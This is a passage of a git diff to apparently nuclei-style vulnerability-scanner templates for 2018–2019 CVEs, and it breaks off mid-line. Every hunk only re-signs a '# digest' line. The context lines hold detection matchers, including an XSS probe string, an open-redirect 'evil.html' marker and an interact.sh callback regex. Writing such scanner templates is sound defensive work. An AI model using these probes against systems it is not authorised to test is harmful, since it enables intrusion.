490a0046304402200516ea6f8a0d845920eddce6ab005229196091284f76526afe11c533b26be2c3022071b807d7cf84ff55220922e485a508a98578a293a19f62d1212e176214d2ff1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022056d88945bf1ce578766104e9981e9cbbad4333aca3c86b93e6b24a78c9084932022100f1bbd9ba23d65f420d43e27f6b168d6e34014aa91c5d971299acb57bd86f5828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 96beb15fe8d..782bc28296c 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -52,4 +52,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a0046304402200385e15b38df06eecffcda2e075d94184448132ae83927de7dd5d5c0b2ea049202203093a847f23de0af5fb5405761430115cec34d96803061682451e486e4aa20d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdefcac984d5096c8f97542a8ef72a688e833c6922f2a83e6b25e47fa1936b5f02203f4e33bedb0b08b8c4d6d5c5169db7ecf09172a3c605aec01052958b2bb431e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6882.yaml b/http/cves/2018/CVE-2018-6882.yaml index 58cf44f26a7..ecb201cb28b 100644 --- a/http/cves/2018/CVE-2018-6882.yaml +++ b/http/cves/2018/CVE-2018-6882.yaml @@ -147,4 +147,4 @@ tcp: - data: "QUIT\r\n" read: 1024 -# digest: 490a0046304402202b925cdcaf6152b87c1a6e7a6d19d3a3c0d7a3b4544ff0e4229c9e14217bd4160220599b46365c441eef8daff24e5e89b49f62dbfbb0aa707c44234f624bd046b9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe8b721d26f4a335a7697a8881b05b853ccb7d34e99ea7d13dde5c840f4024c702202f7e95141960139b556b56aaddcf00fec5a86d0d01285441ffffe73b08cbc276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6961.yaml b/http/cves/2018/CVE-2018-6961.yaml index 6469bba7410..92730e372ac 100644 --- a/http/cves/2018/CVE-2018-6961.yaml +++ b/http/cves/2018/CVE-2018-6961.yaml @@ -72,4 +72,4 @@ http: - "UNKNOWN_COMMAND" - "Invalid command" negative: true -# digest: 490a004630440220264c30748d30b8b12e2c0558bd758e40ae52403eb3537a50bcbe179e21c5162302207256508971014bf3fb18af34bbe4a83cdcde54a75b4f5083175e8f6a6f6e3530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a5c0f573768de5b6ead78611ff6a960db0532f75bbc9c572a75c8eb080df9df022100bcbd5fc21dbc697f272fe45c176bff5bb4614ffcd44fe4c941e12b5abfa4e230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml index 0f997ef390f..5cc82083ed2 100644 --- a/http/cves/2018/CVE-2018-7192.yaml +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -72,4 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a004730450220028f554724d0e7c7783c5c9af0d6975b001abbdb2bf6b978264f4659e940adfc022100d13dd0e64eedbe48305ed67f962021c3096e414d35c8be7923f84f586ad99dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014793dfa9c855aa262807e08e06e367f367b7e0854cc00f9316cf2929f90ea78022100f8b72a4582e97e030fd7acf21f6c6fcfa74686df6f83309368a1621829c0e126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml index 9e9eaec95f3..2406e9bd3be 100644 --- a/http/cves/2018/CVE-2018-7193.yaml +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -72,4 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502203b64b5038aa96190a66dc2abfe6ca4d2953f234d348a2e5e44906011ea000521022100f81368fe6626187880127ef5f89ecf9ea85237966ffefa3989a875c5b6e6c032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d29996b18754b71c680cd2d8f272fdda03f916b6ea9faea867867da559d7b30d022039eeda40884c51c8aef16032c691465a291d876291683e3e2e9334c99aeafbb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml index d15bb675cc0..b97db76c89a 100644 --- a/http/cves/2018/CVE-2018-7196.yaml +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -72,4 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100ffd70bbd99538338fc0f642763aefb5fbb093ebf8eb5a6b5ea05271dd801363d022018c3dda0ee3db67a346bdbf186f949ebe2fa1c2c407add07ac450856fbad5cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ca26f669eb7dc795e12aaf537e9f3d93b9c66148a53ca7b0c7adfcd9dcb5ba9022100c1990e3ba7179384d599570f52fbf8049cfd0003a3da4869cee2afa398a805ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 29ce0b9c473..c45b3be9fff 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -42,4 +42,4 @@ http: - '"message":' - '"trace":[' condition: and -# digest: 4a0a00473045022075a16fc6dcb38344cd2beec67fe2a325fa05f9e2e6c8a14d79f8771a787ace6b022100f5c119822266dbe429e6d6a6f45cd2d27151521a850c6d2f19efed83c51f1199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090f00c6a19d247d0fe598119e1e9c98636ddfc6cf9ae10d67adca1eb794b39fc022100b5582c01c590700ec76ebd230cf1747b79410bddd4c34473d116902d3f374ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 0470173a722..5a7a5423694 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -56,4 +56,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 490a004630440220135de4c0efe8f0f8a3e0e29f287d9dd645875208c56f6021f8eb7487f6865a2f0220379dcfaa8c0a193e89dab1fa12f23b48e5cbcaa5f9aa88cbe0579170a7c11cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220419d21cb1917f99da4ac52be910edaa253095ce8f1cc12a1779cfe269c2a6fa8022100a3109b30cbd5fa359a001b8f02b6aca41a4a081ed99d3fb983f7b66bfe986bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index a94f14ac0f7..878b0af10bb 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -45,4 +45,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4a0a004730450220133c68366ea696b4f22e6c9ace21ba0812669f2023cda7d89f1aa79335136c08022100c705fc2b987c37734204d5db4ee2546732a2e92f2032ec8960ed9f0770bf6849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa8e982de4b78b5dd7b5fe72707c8c25edf010ecdb64e3b3d71eb0974cd1f2db022100dcc84687196f54429e4cb36795a5d5c29b067fc05585c83faf2b229f129867eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 80d4ead6356..e25ce97d301 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a4de7eb21267e6664b47413acf7715eae8eb0b6c2da93a71f47ec8028c02604f022020d2bfa9ebc029f6d10ff1251158f828cf5054ee616746da1eb60e7afec0abdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220299630b3233a714b9f705396ffaa85c348914692efdb48d49ba3ce8d535c520e022100b3c50653f8a1013ee8e0eb595433ce302452e3f8212cffed00e8183a06032d9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index c8bc83e3ccb..7130bcc802e 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f728d6072fd1b55bb370e230e06014a81b93b4ef67c42f997555a00e3f1c922d02200edf2e156d0d0b30ddddcade4c205409ea08dea4b5889fac557bbf8495ef3c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022067bb1179d172353b0ab2bbce268985e06eeefb0060d5c3722d60bf46149a15bb02202e0ed24796b412d1092ba94942e133d109d2021d041e3cb34653c1b1ffa44687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7765.yaml b/http/cves/2018/CVE-2018-7765.yaml index e774068fdec..d3ae21f0c3d 100644 --- a/http/cves/2018/CVE-2018-7765.yaml +++ b/http/cves/2018/CVE-2018-7765.yaml @@ -64,4 +64,4 @@ http: - "contains(content_type, 'application/octet-stream')" - "status_code == 200" condition: and -# digest: 490a004630440220294d3f52507ca285fc87eed64eea51b459d8c327c87524b51ab63e82ffd3786202204080f836a5deda03946d16329cf3c34b655ad0e3d8424d6522c9c082f6373217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8d79cb9142b01ec8e9231ba383fadc97f1f90432ad16927f981a703f8d6134502205fc81a9c81e83a65a709c98059d21835432ae9eebce3cd5f3623d9f14c584c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7841.yaml b/http/cves/2018/CVE-2018-7841.yaml index fb18d81fd1b..a9e1ed36a17 100644 --- a/http/cves/2018/CVE-2018-7841.yaml +++ b/http/cves/2018/CVE-2018-7841.yaml @@ -50,4 +50,4 @@ http: - contains(content_type, "application/octet-stream") - status_code == 200 condition: and -# digest: 4a0a00473045022067861959a0b4c4fce93965e39fdc332b23e4f52ca10102821fb5f7d7f1be0029022100b857d83d751acefa57d09368bfa4749b6370db76773a2b2f6d10fa844f19baa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a378a15934840bd1bbe574c79d78626e79e9a517af875a3f80ef91f316f058e402206871a8b91a6aac068fa08dae3b62671e97ec7535cc87a717e5a5c9327d2aeaa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8024.yaml b/http/cves/2018/CVE-2018-8024.yaml index d556ac4f90a..0dfbe36a50f 100644 --- a/http/cves/2018/CVE-2018-8024.yaml +++ b/http/cves/2018/CVE-2018-8024.yaml @@ -44,4 +44,4 @@ http: - "contains(content_type, 'text/html')" - "contains_all(body, '><script>alert(document.domain)</script>', 'Spark Jobs')" condition: and -# digest: 4a0a0047304502210098d41bb6c91709f36c8270f7bc9fdf1766fc29e5820bc907579d095e60da6d1302202eb6d4dffb2113eeaa8818ffb03b08e1221648e3f837dc4c1ce28c9d64a5a86d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d31a6095bc48f5f6cd24d94b8b72223959931773e42c24820e1d2ea6a956daf602206b2c40893316230b5b19d2c96734d0cfc1f1f67ba6fe98ee2b6f87d64f77c7b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index f9d5ff22168..263aa4bfd8a 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022003e1757eadb76517b5c2e7b42648ead33e2e38ef7d97151d60ddbca43b32f1e702204d0ba479e6d9ab6151ecf9d1f3cc3c71efad3faf75de2828810b0db07309d74d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea5d8214f3e0d1c8861d2bd516487eecc6571e876029653abf222604b97de060022024e51ea9dc0683f1e71c22453d6452a175f509ab224f34d29d6de1ad9a796888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 745bc87f825..d30bac5508b 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022042c81ae5f53da43d50d9448aebb1b6fcffeccc2ef77dc67f91ab1333a4232332022100895718d357daa9e817bb33acf7a75f43cd14ff5ffc3b3d773d4d5766e79c8063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be7920f6d835ff11180cb4ac26cada4d631b0527e67fa06939c1baa326620cb4022100b1a78d7b76c77227cc646282559d3fc496198d631bb59df3228ceef10f91a024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index d40f6971a35..d62f9bbe627 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -42,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100fa640bd9dda2f4e870f06cc4cde057e6443380cfdba7d3b17d051d7ffb9b3e940220207dc5c8489d5b1d9f6213787964d6e2d98ceb685cf5380c7b84d55ad1da20ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f48496c9bb9a526d89cbe730b7e6e2fcd8adc9638e58732e5327534cde372c3e022034bd1a7b9e17f14cfaa09c66b65487dfa33d0a6ab0ce183d6c8304c38df9eb25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 6cb1d389441..501c34e0aea 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efd2c97db58cba668fda41accf6fcdb897159aac68e6f048cafe2b6c3530e9880220268825ceb0dfeb2fd3a06ff8ab520bfca65e0fd09bc2e64653adaa1b3cd5ffe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c28f49e634b7cc782043225b72cf4af7319934d11125854c7c6862dd813d73802202e75f5d0d5cff77f9934c61ff5fea0d545e9ce5c84d988c9a62d2e23b1b134d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 49aca4910ea..59a0a2a4fee 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066c02c6fe8dcad093e666af34ee643ab5095d9fc5094bb08c75cc34a26b8ac97022100c9e9ace41ddb6670d62a85ea0829b10d8d279cb0d1c1c5301b4c6b7ee5346ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f20cbc3c36e7191eb235ceccf88a03564d7b0dfc5b7fb9dc34759e50bd1eb493022100f38713d149c27446692553986590553b016e9177e9383d7010674a5051de3fd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9206.yaml b/http/cves/2018/CVE-2018-9206.yaml index 36f74419cb4..ba3c7d39928 100644 --- a/http/cves/2018/CVE-2018-9206.yaml +++ b/http/cves/2018/CVE-2018-9206.yaml @@ -70,4 +70,4 @@ http: - "contains(body, '{{md5(hash)}}')" - "status_code == 200" condition: and -# digest: 4a0a00473045022005d50c6f1091a214d89a9c613b9514cdeb7f82f8ce875c02d6925957c172cf8f0221008d9d1844e64523840e9c06555043e45ddfa371eb36f671025f64656f3f7cc703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220427a309d88dfb744665c4eb533c0b9f89198380d1733a190a829daa8a10943bd022100852a9e2186e2938bedbe215116d653645473f977f6a47e6881e155a9d0920082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 52d1317e713..4c91acb7180 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100859bbf9bfa170b92c5d69b49f95b063c5840ed0538c11db23458aacd20620fcb022100ca74f2fa8224553460c460c51311580408597fe5c557f5a20c023eb5bb6adc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100acdbe6c0f6895b5caab6602fa0a8707ae4f6c62065d09578b67ae647b18f3f7e02202fb334b5f05aefd5ee1f1e808875a6ec7385ba554073bb15c8f5c3b7f65ec9ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2019-10647.yaml b/http/cves/2018/CVE-2019-10647.yaml index 0238056dfc1..65b8618a55f 100644 --- a/http/cves/2018/CVE-2019-10647.yaml +++ b/http/cves/2018/CVE-2019-10647.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220515ab6f714fcd864e90575a5abf07ba7f072cabd6961cc4ff9e0be27614da523022100fc9e49f7a0dc10704e8dcc0189871466e9d626fafb0d4313ceaa882ca8c98d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b555e4eb9632457f3310b83c266fb3f823d58f6a6775decc62bb7e77a3ba836022100d5ba9929c3946fdf3c2dd23d060c9b728e8ad1e37ec5d8f64d6ca316e729e23e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index b04de084108..c95738dc210 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f53db5b120903f981ddee09704916d80b6918b93daf565648f7fda74270c39c0220576731739bbb99a417dfc10f6929f33b3c7823c02cd02bf010e2528d2ae05fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220713494cddf9af9e045b65d2bffd99358a3cb1a3ce530f524724e919e9ace259c022059b747f7b6e90b0609b45eeb53e57525a2e2a15a62973a86a85835f72d4e6790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index c4cf2da9d81..a888edcba3a 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -50,4 +50,4 @@ http: part: body words: - "{{str}}16384" -# digest: 490a0046304402206dab9468ba315f9bf32e91f5d8ad328c2f48822b387c73f7ecdfdf05c2e6d70b022051f1fdc592f105b69685f3a998d651e19785c94215080d9ecd947f0dac742c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207cc9b1564ebb473d9d8f34bde36e1ff13789368ac214a55b5dba4a60924d1e9b02201d571678d58d5bc5308b108f4f1f8cd70f95f67156fa7c116e8153ffa33593e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1003000.yaml b/http/cves/2019/CVE-2019-1003000.yaml index 1837273c54f..d93666a536c 100644 --- a/http/cves/2019/CVE-2019-1003000.yaml +++ b/http/cves/2019/CVE-2019-1003000.yaml @@ -102,4 +102,4 @@ http: part: interactsh_request words: - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom" -# digest: 4a0a00473045022060a7999ed917f55a160a0600bfced90080dcf3b06c1a77551d236f66428a8ba7022100c8f7f238dc44a381a316e7c8483b4ab3cf53d73af6db6aa362efaacce8509c53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100920ec26606e3b0e5a6f6d0306495f2e62313741fdd32021b67c81bd023902995022100a048cd96471039e10eef2a1febb2167585542e94c4bdd46bafc3cea50a131297:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 339866f632f..f1ce3533f08 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -46,4 +46,4 @@ http: - type: word words: - "<a href=\"/\\google.com/evil.html\">" -# digest: 490a004630440220427420e6d9c84ed7b06b09235057988d1e6747462d162d1119d3d2cc2eff3ea0022010ec23edc147d8e2cfa1cadf94d5ef08e531679187c902d354b786514b238bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207167d650f893891009fc491512f31407cde82ec8690b070f2c54e4850f28b1bd022100dfc9773b6e9bbf80745b22efdeafddb2589787bab46af1c888a19e4311ff853b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 09f527053ea..69743bb1a68 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012439ea0a4febcc499cfe4f0317f23aebb1a413a96aff372579ec9488f1206fb022100f185b6de4bd4ebbf5076fad62e97da996d99d836c5b0ae03f4d7a81fb8eec129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b28461c1880aaf7cdaae3bac0139662d3e48d9546ca935b9ff5d3388fc64f6e6022100a9104c34f49e379b06b83ba188a99d5fd3db29f28389a06f4fe2b3a5e41fdfb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 019dff7b444..cf4a798208d 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221008a81be9b26dd50606bc869eaf513933c61a3fa2d4259e03cbb955273c159facd022100994b173ac4c4683063c90565bb2060e6b0a7df446daf1001d563b38db60a7fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc815d8af5765ecfadc52e8795a7f7d6d32243d51a57bd69f367217680a57e61022100c2b71e3925fba033805c1fd311494b0580a7182b6f676f2d993bda5e4347125f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index cf226806234..874f5ce83b6 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -49,4 +49,4 @@ http: regex: - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" part: body -# digest: 4b0a00483046022100bd2f21dcc3a17d5ef9d0eea5b2904765903c87cad39ba1861d44edb2517e657d02210080d6548bcaf9cc92699dc950bd665673959ebcafd48547ebdce703fbb590458f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081e5a5de094d6947b4b53a4eb08033bcb4d417c735baaeda6a13e01bc05623460220125b5d93e2bbca0b6e364e4fbbf87113e3dc5b4be06c3c96fd8b752d7b6062c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index a32a98f61a3..f955155cfdf 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -67,4 +67,4 @@ http: - type: kval kval: - x_jenkins -# digest: 4b0a00483046022100a7db49f060610110c26d3ef3069b8eff298955293961141f0ac01062ce7d86a0022100926a4ac7d6d626c5e483bfc92152fb617ca042083b99c4032283b66c6e1d7d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088710889c2ca2e8cdfbd44bf78273afd51d31da6ed6e720cd05ab504a1391b1b02203631ae65db71d7febaa894d54c36b370c628833b34deaa84314e69aba8a3d42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 00509efe84e..32be772b14d 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009d7e5b4acfa0bd37e8b94cf2604a07c04d400762d407fee656bfc91ab4956f8f0220518c898ef5ba11ef6186d29561d534cf3aaad4393d54d9b0e34edef926ca7757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220697b1ceb24ef2e52b491795ee59ba57f3c4e1a0f8073c66c9989a5961121ea0e02202357c2b92faf407806bba19c37c5a8fa0acf0c7e35b29afbf4835c9231b0149f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 8ccc28f881a..c7498430417 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cdf281b4bf2ddf6029e073e7ec6714d72662bf3c84e4566c5cc4c7b2a266731f02206cc2895958073113561e57b4e9671efa4583187376889e809426b3efd2f88f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100806bf8ba02d81104cc7f90edc9b4a2171554afe0c14cb50db8e5debd855413bc022100ba6fdbfebb74eace153bb18bcc60771c7752483ca3eaca262f58933470beddb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 85f77e88787..526ccf5b7e0 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7f54d3303108e69fc5315d68459461f0d23a8ddabf2975b563cd108e0486e09022100c43c98c9fecaf5a6716f83f5afa5793b360b280603415da8067858ad6235a114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e15e0822adabf9ec361c40bc3df85ffa0090a502ac542708357e05bc0bcd8b5e022020b70a29cdaa3417464774f595a08804b62cb10cea55666cff78b6857dac7e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 42550d36fc9..92b77af8217 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -49,4 +49,4 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4a0a00473045022100e6c13d43cc8e4fa3728ab322d11e1bdf3a989c922604177ef01a85e16e009eb60220410d535216d700779b7346997e6f7ad8097b339a7d0bbfabe47f2012bf206df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005a537e822bafd450c51925a3d75333194905482597a09d6cf44b18de99f5308022100a5f1501d87f7d40aecc19eac96a5d57256b4420d1a259ba33dc413e8843d8e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11253.yaml b/http/cves/2019/CVE-2019-11253.yaml index 176eab53dab..cdf07a5865f 100644 --- a/http/cves/2019/CVE-2019-11253.yaml +++ b/http/cves/2019/CVE-2019-11253.yaml @@ -46,4 +46,4 @@ http: - "FieldValueInvalid" - "422" condition: and -# digest: 490a004630440220248c8451ee475590fffc5e5c03eefebad1fa58b5a2ac1b86f9eb487c2914cad6022018136d71ec86dd6945176b8c20c942ffc1559f29378a4b1683a4c1a2b6ca0a7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 